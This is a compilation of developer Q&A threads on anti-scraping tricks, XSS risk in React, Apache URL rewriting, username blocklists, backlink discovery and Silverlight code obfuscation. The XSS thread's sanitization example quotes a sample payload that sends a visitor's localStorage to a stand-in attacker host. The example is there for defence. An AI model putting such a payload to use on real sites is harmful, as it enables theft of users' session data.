What's a good way to protect a link database from automatic scrapers? - screen-scraping

I have a large link database that I want to protect against others who would copy it. Is there anything I can do other than forcing people to enter a CAPTCHA before each link?

You can output the links using ROT13, and then use JavaScript to put them back to normal.
This way, scrapers must support JavaScript in order to steal your links, which should cut down on the number of eligible scrapers.
Bonus points: replace ROT13 with something harder, and obfuscate your 'decode' JavaScript.
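A minimal sketch of the idea (the data attribute and markup are illustrative): the server emits each href ROT13-encoded, and a small script restores the real URL on page load.

    // The server renders links like: <a data-enc="uggc://rknzcyr.pbz/cntr">example</a>
    function rot13(s) {
      return s.replace(/[a-zA-Z]/g, function (c) {
        var base = c <= 'Z' ? 65 : 97; // uppercase vs lowercase alphabet start
        return String.fromCharCode((c.charCodeAt(0) - base + 13) % 26 + base);
      });
    }

    document.addEventListener('DOMContentLoaded', function () {
      document.querySelectorAll('a[data-enc]').forEach(function (a) {
        a.href = rot13(a.getAttribute('data-enc')); // decode back to the real URL
      });
    });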

The JavaScript suggestion could work, but you would render your page inaccessible to those using assistive technologies like screen readers, as well as to anyone without JavaScript.
Another possible option would be to generate a cryptographic nonce. This technique is currently used to protect against CSRF attacks, but could also be used to ensure that the scraper would have to request a page from your site before accessing a link. This approach may not be appropriate if you support hotlinking, but if you just want to make sure that someone went to your site first, it could work.
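As a rough sketch of the nonce approach (Node.js purely for illustration; the link layout, expiry time, and in-memory store are all assumptions): issue a short-lived token when the listing page is served, and require it on the link endpoint before redirecting.

    const crypto = require('crypto');

    const nonces = new Map(); // nonce -> expiry timestamp; use a shared store in production

    // Call when rendering the listing page, embedding the result in each link,
    // e.g. /go/123?nonce=abc...
    function issueNonce() {
      const nonce = crypto.randomBytes(16).toString('hex');
      nonces.set(nonce, Date.now() + 5 * 60 * 1000); // valid for five minutes
      return nonce;
    }

    // Call from the link endpoint before redirecting to the real URL.
    function consumeNonce(nonce) {
      const expires = nonces.get(nonce);
      nonces.delete(nonce); // single use
      return expires !== undefined && Date.now() < expires;
    }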
Another cruder option would be to check referrers. These can be easily faked, but it might stop some of the dumber scrapers. It also only works if users pass through your site before they hit the protected links.
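A referrer check is only a few lines (again a sketch; the header is trivially spoofed and sometimes stripped by privacy tools, and example.com stands in for your own domain):

    // Reject link requests whose Referer header does not point back at our site.
    function refererLooksValid(req) {
      const referer = req.headers['referer'] || '';
      return referer.startsWith('https://example.com/');
    }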
Can you let us know if you are hotlinking or if the user comes to your site before going to the protected link? We might be able to provide better advice that way.

How can a hacker perform an XSS attack if he does not have access to the user's computer? [duplicate]

I am reading some articles about security in React applications. I use localStorage to store the user's info, and I've seen that an XSS attack could easily allow a hacker to steal it.
However, I understand that in React an XSS attack can only be performed through dangerouslySetInnerHTML displaying content written in an input. That way, you can steal the user's info, session cookies, etc. and send them to your website.
But a hacker could only do this if he has the chance to write his script on the user's computer, right? So, if I don't use dangerouslySetInnerHTML anywhere, is localStorage safe in a React app? If not, how could a hacker run such an attack on the website?
If the user uses a public computer it might be possible.
If you have functionality which allows external users to post content on your site, for example comments or reactions, then someone might write a script which sends localStorage data to a hacker.
There are a lot of ways to exploit this; check OWASP for a more detailed explanation.
https://owasp.org/www-project-top-ten/
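To make the comment scenario concrete, a hedged sketch: React escapes interpolated text by default, so the danger is user-supplied HTML reaching dangerouslySetInnerHTML unsanitized. Sanitizing first (DOMPurify is one common choice; the component and payload below are made up) strips such payloads out.

    import DOMPurify from 'dompurify';

    // A stored comment like
    //   <img src=x onerror="fetch('https://evil.example/?d=' +
    //     encodeURIComponent(JSON.stringify(localStorage)))">
    // runs in every visitor's browser if rendered unescaped.
    function Comment({ html }) {
      const clean = DOMPurify.sanitize(html); // removes scripts and event handlers
      return <div dangerouslySetInnerHTML={{ __html: clean }} />;
    }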
Developers must accept what attackers can do:
They can retheme an entire site.
They can also write "bot" scripts to automate tasks, in other words flooding your server if that is the task.
All limits defined in JS/HTML can and will be bypassed (e.g. character lengths in forms).
The entire page can be rewritten so it no longer talks to your server correctly, in other words crashing it, and more if it is not handled/detected.
The list goes on, but accept that pretty much every client-side guarantee is off the table if someone wants to pry hard enough.
There's not a whole lot you can do to prevent this. To explain: you can add an external script from randomxyxsite.com, and though trusted, that script could come under an attack where it now runs loggers or some kind of analytics-grabbing bot. In my opinion this is easily avoided by not adding external scripts if you can.
Though I said what I said originally, here's where you're stuck...
Any user can open the console, build extensions, or use a third-party loader like Tampermonkey and other alternatives to execute scripts at will. This too can become "shared", comparable to botnet behavior.
So what can you do to stop clients from misbehaving or "super-modding" their content for malicious server use?
Some ways to safeguard (see the sketch after this list):
Server-side requests should pass through some form of check/sanitization to ensure that whatever any client passes in is absolutely safe to absorb.
Never let users tell you who they are beyond login; define them by session ID, know them by their session, and when user <> user, get between them and follow the point above.
Keep as much as possible private. Public variables/classes/functions are easily rewritten at runtime, leaving features you relied on to fall apart.
window.PayFeature = function(){}; // a global like this can be redefined by any visitor from the console
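A hedged sketch of the first two points (Express-style; the route, limits, and session wiring are all assumptions): validate every field on the server and derive identity from the session, never from the request body.

    const express = require('express');
    const app = express();
    app.use(express.json()); // plus session middleware of your choice

    app.post('/api/comments', (req, res) => {
      // Re-check limits server-side; the client's maxlength attribute proves nothing.
      const text = String(req.body.text || '');
      if (text.length === 0 || text.length > 500) {
        return res.status(400).json({ error: 'comment must be 1-500 characters' });
      }
      // Identity comes from the server-side session, not from the request body.
      const userId = req.session && req.session.userId;
      if (!userId) return res.status(401).json({ error: 'not logged in' });
      // ...persist { userId, text }, escaping on output...
      res.status(201).end();
    });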
ALLOW XSS?
If it is feared, a developer should study it more. As much as a user can distort/change their end, it's only an issue if the traffic changes or the data received from them starts to look like an attack. So as a developer your best bet is to rate-limit, set rules, and so on for users, so that abuse is detected and stopped. As long as you do that, you should never fear it but welcome it; once the server is secured, it becomes a matter of spam (a potential botnet).
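A minimal fixed-window rate limiter sketch (the numbers are arbitrary; a real deployment would use a shared store rather than process memory):

    const hits = new Map(); // ip -> { count, windowStart }

    function rateLimited(ip, limit = 60, windowMs = 60 * 1000) {
      const now = Date.now();
      const entry = hits.get(ip);
      if (!entry || now - entry.windowStart > windowMs) {
        hits.set(ip, { count: 1, windowStart: now }); // start a fresh window
        return false;
      }
      entry.count += 1;
      return entry.count > limit; // more than `limit` requests per window: throttle
    }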

Apache hashbang URL problems

I set up an older Rails 2 project on a brand-new Apache on Debian Squeeze. The project itself could be a single-pager, using links to scroll the page up and down. My links look like this:
http://mydomain.com/en/#home
These links work fine as long as JavaScript intercepts the click event and simply scrolls to the intended section. In case the user leaves the single page and opens one where these links (still the same) cannot be followed via JavaScript, I only receive:
Forbidden
You don't have permission to access /en/ on this server.
If I change the link to:
http://mydomain.com/en#home
everything works fine and as expected. But I do not want to change my link structure. It already worked well on an older Debian 5 box.
I expect this to be an Apache 2 configuration issue, but cannot find anything useful on the net.
Looking forward to any kind of enlightenment.
Thx
Felix
I don't know how or where you are working with JavaScript in relation to this problem, but let me tell you this:
Everything after the hash (#) is never passed to the server. That is standard HTTP behavior; the fragment simply is not transmitted.
It is only intended for navigating to an anchor within the page, and today it is also used for a lot of newer techniques including, but not limited to, XSS tricks, JavaScript hooks, etc.
It is possible that links are prevented from loading by an onclick handler that does something else via JavaScript, but it is not possible that you end up on the page http://mydomain.com/en/#home if http://mydomain.com/en/ does not work.
However, to solve your problem you probably have to adjust your Apache rewrite rules (or enable mod_rewrite at all?) to also capture links with trailing slashes.
The links http://mydomain.com/en/ and http://mydomain.com/en are different URLs and could serve completely different pages.
I would strongly recommend not letting this become a mess: do a strict permanent redirect from one to the other. Which one you choose for primary usage is up to you.
I prefer a trailing slash and can also supply arguments for that, but they can be invalidated easily and replaced by arguments suggesting the opposite. You should find plenty of discussion on that if you search for trailing slashes here.
To solve your problem, try to find the relevant RewriteRule, copy it, and add it one more time with a trailing slash. See whether it works, then make a redirect to the URL without the trailing slash.
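A hedged illustration of that advice (the patterns are hypothetical; adapt them to the rules already in your vhost or .htaccess):

    RewriteEngine On

    # Permanently redirect the trailing-slash form to the canonical URL.
    # The #home fragment never reaches the server, but browsers re-apply it
    # after following the redirect, so /en/#home ends up at /en#home.
    # (Per-directory/.htaccess pattern; add a leading / in server config.)
    RewriteRule ^en/$ /en [R=301,L]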
You may also edit your question and post your server config to get help with that.

Preventing dictionary user names for registration

When I was setting up an account with Gmail a few years back (probably this is still the case, haven't checked), I noticed that the system doesn't allow registering common terms or nouns as usernames; it seemed to use a sort of dictionary for screening. I would like to implement a similar feature in my app. Anyone have an idea how to tackle this? The app is written in PHP, but I understand I'll have to hook it up with an online service.
Thanks
WordPress MU has such a feature too: you fill in a list of usernames you want to avoid and they become unavailable to users. You can check its source to see their approach...
Sinan.
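A minimal sketch of that list-based approach (JavaScript here for brevity; in PHP the same check is one in_array or isset lookup, and the word-list file name is a placeholder):

    const fs = require('fs');

    // Load a dictionary/blacklist: common nouns, brands, role names
    // (admin, support, root), one per line.
    const reserved = new Set(
      fs.readFileSync('reserved-usernames.txt', 'utf8')
        .split('\n')
        .map(w => w.trim().toLowerCase())
        .filter(Boolean)
    );

    function usernameAllowed(name) {
      return !reserved.has(name.toLowerCase());
    }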
Well, the API will vary from service to service, so I'd suggest you find one, look at their developer docs, and then ask here if you have a question.

Best Way to automatically find links to your content?

So, here is a task I've found myself thinking about. Pretend for a moment that I have a large body of content. I want to see which websites are linking to my content. I know that I could look into TrackBack or PingBack, but what about sites that aren't using tools capable of dealing with those?
It would seem that some form of web crawler that looks for pages linking to the original document might be useful. My question to the greater community is: what would be the best way to get started here? Do TrackBack and PingBack do more than I assume? Are there services or tools out there that already do what I'm thinking of?
Google is your friend!
Use the link: prefix:
link:whatsite.com
And yes, trackbacks do more.
If you have HTTP referrers set up in your logs, you can mine them.
You can even discover pages that you did not know about.
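A quick sketch of mining a combined-format access log for external referrers (mydomain.com stands in for your own host; the field positions assume Apache's standard combined format):

    const fs = require('fs');

    // In the combined format the quoted fields are: "request" "referer" "user-agent".
    const counts = {};
    for (const line of fs.readFileSync('access.log', 'utf8').split('\n')) {
      const quoted = line.match(/"[^"]*"/g);
      if (!quoted || quoted.length < 3) continue;
      const referer = quoted[1].slice(1, -1);
      if (referer === '-' || referer.includes('mydomain.com')) continue; // skip internal hits
      counts[referer] = (counts[referer] || 0) + 1;
    }

    // Print the top 20 linking pages.
    Object.entries(counts)
      .sort((a, b) => b[1] - a[1])
      .slice(0, 20)
      .forEach(([ref, n]) => console.log(n, ref));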
Otherwise, there is the paid Linkscape from SEOmoz or the free MajesticSEO (if you confirm ownership of the domain).
MajesticSEO has a bigger backlink index and an API (login required).

Obfuscating Silverlight XAP

I am wondering if there is any efficient way to hide our Silverlight code. I know there are some obfuscators available, but it looks like people can hack those too. Has anybody had any success on this front?
Pragma No-Cache on the page hosting the Silverlight application will prevent the browser from caching the XAP; instead it will read it by streaming from the web server. That will make it harder for people to get the XAP. Obfuscation will make it harder still.
Also make sure the app is hosted over HTTPS, and have authentication take place outside the main application. This way the XAP stream is encrypted on the way down.
You really can't hide anything that gets transmitted to the client. If people want to figure it out, they will.
You need to put any proprietary code in your back-end where client machines can't get at it.
No. The client browser must be able to read the code; therefore it is hackable.
Here is a short article on how to obfuscate a xap file
http://www.rudigrobler.net/Blog/obfuscating-silverlight
You could complicate a potential hacker's job by downloading obfuscated fragments of your app during execution, using MEF for instance. Needless to say, this is only interesting if your application is big enough that the trick speeds up startup time rather than hindering the user's experience.
It won't prevent a determined hacker from getting your code (in the end no method can prevent this, as the Silverlight plugin must be able to execute it), but it will complicate his task greatly.
Preventing the browser from caching the XAP is useless, as is using HTTPS: it's far easier for the attacker to grab the XAP with a tool like Firebug than to dig through the browser cache or mount a man-in-the-middle attack.
I imagine that if you had a lot of motivation, you could:
obfuscate every assembly
use dynamically loaded XAPs
encrypt the dynamically loaded XAP server-side and decrypt it client-side using a dynamically generated key sent by a web service (not in the same request, and don't reuse the key)
It won't prevent the attacker from getting your code, but he will have to analyse your initial (obfuscated) XAP to understand the decryption code, get the key, get the encrypted (and also obfuscated) dynamically loaded XAP, decrypt it, then manage to deobfuscate it, then understand how it plugs itself into the application.
It's not the same as using HTTPS, because here the encryption and decryption are done inside the application, so tools like Firebug or Fiddler become useless.
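Silverlight specifics aside, the shape of that scheme looks roughly like this (sketched in JavaScript with the Web Crypto API purely to illustrate the flow; every URL and name is made up, and a Silverlight app would decrypt the XAP in C# and feed it to MEF's DeploymentCatalog instead):

    // Fetch a one-time key and the encrypted module in separate requests,
    // then decrypt client-side before handing the bytes to the loader.
    async function loadProtectedModule() {
      const { keyB64, ivB64 } = await (await fetch('/api/module-key')).json();
      const raw = Uint8Array.from(atob(keyB64), c => c.charCodeAt(0));
      const key = await crypto.subtle.importKey('raw', raw, 'AES-GCM', false, ['decrypt']);

      const encrypted = await (await fetch('/modules/feature.enc')).arrayBuffer();

      const iv = Uint8Array.from(atob(ivB64), c => c.charCodeAt(0));
      return crypto.subtle.decrypt({ name: 'AES-GCM', iv }, key, encrypted); // module bytes
    }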
Ahem. Nothing can prevent anyone from reading your code. BUT you can make it not worth their time. You don't have to use all the ideas here, and I am sure you can find others, but make sure that implementing such measures is worth your time too.
Either way, it was rather funny to write this :p
You cannot hide XAP files (at least not non-trivially). But you can obfuscate them. Obfuscation is not a definitive answer, but it's a start and can give pretty good protection.